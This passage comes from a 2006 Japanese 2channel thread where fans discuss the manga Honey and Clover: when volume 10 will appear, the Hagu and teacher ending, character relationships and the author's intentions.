10巻読みたい!
いつ頃でっかなー?

985 :花と名無しさん:2006/08/05(土) 01:40:48 ID:???0
>>978
ちょこっと訓えてーな

986 :花と名無しさん:2006/08/05(土) 01:49:11 ID:???0
っていうか、山田と野宮はできちゃったの?

987 :花と名無しさん:2006/08/05(土) 01:57:45 ID:xURS1LkV0

羽海野チカ「ハチミツとクローバー」その54
http://comic6.2ch.net/test/read.cgi/gcomic/1154710459/l50



988 :花と名無しさん:2006/08/05(土) 02:29:15 ID:???0
>>987
乙です…

989 :花と名無しさん:2006/08/05(土) 03:28:28 ID:???0
>>986
近々そうなってもおかしくない。

990 :花と名無しさん:2006/08/05(土) 06:54:27 ID:???0
>>989
そうならなきゃむしろおかしい。

991 :花と名無しさん:2006/08/05(土) 07:13:09 ID:???0
>>980
たけもとはその意味を先生はまだ見つけていないと思ってるのかな?
はぐも?

992 :花と名無しさん:2006/08/05(土) 09:38:28 ID:???0
ひよこちゃんたちのほんわかストーリーで、血とか肉とか人生とか捧げる云々

もっのすごい違和感だし気持ち悪い
しかもその対象が幼稚園児としか思えないアレだとは

993 :花と名無しさん:2006/08/05(土) 09:48:38 ID:???0
先生が自分でみつけるってのは、
はぐが「クローバーなかったのー」ってえんえんないてた時に自分で言ってた
「俺はもうはぐにいっぱいもらってたんだよ」ってやつでしょ。
それをもらいつづけるんでしょ、先生は。

994 :花と名無しさん:2006/08/05(土) 09:59:23 ID:???0
おねがいリカの自殺の件について詳しく教えて
ちょっとだけでいいから

ハチクロ1巻だけ買ってツマンナイと思い売って、
9巻まで読んだら面白くて全部コミックス集めようと思ったらなんか
変な終わり方してるんですね。
どういう流れで臭はぐエンドになるのかが気になるから10巻は買おう。

995 :花と名無しさん:2006/08/05(土) 10:00:51 ID:???0
いつか(はぐの卒業で)終わる祭というモラトリアムの中で見出せるものと、
はぐ(と自分)のこれからに、文字通り血肉を捧げて関わっていく一生の中で見出していくもの とでは
また違うと思うのだが。
まぁ解釈は人それぞれってことで。

996 :花と名無しさん:2006/08/05(土) 10:08:14 ID:???0
どうとでも受け取れるような曖昧な終わり方したよね。
玉虫色とはよくいったもんだ。

997 :花と名無しさん:2006/08/05(土) 10:08:52 ID:???0
>>994
>リカの自殺の件について

もはや都市伝説になってるから
皆あまり口を開きたがらないだろう…

それでも知りたいなら…

やっぱり最終巻を待て。

998 :花と名無しさん:2006/08/05(土) 10:14:33 ID:???0
先生は日本画コレクターとか
ぶっちゃけ意味のなさ過ぎる設定が多い

999 :花と名無しさん:2006/08/05(土) 10:15:46 ID:???0
はぐ=ウミノさんはいったい修、竹本、森田に何を背負わせたいのかな。
はぐの人生の欠けた部分をそれぞれ適材適所で補えってこと?
そして自分=はぐは存在自体が幸福、希望なんだから返さなくていいと?


・・・酷くない?(;-∀-)

1000 :花と名無しさん:2006/08/05(土) 10:16:55 ID:???0
せんげと?

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

236 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)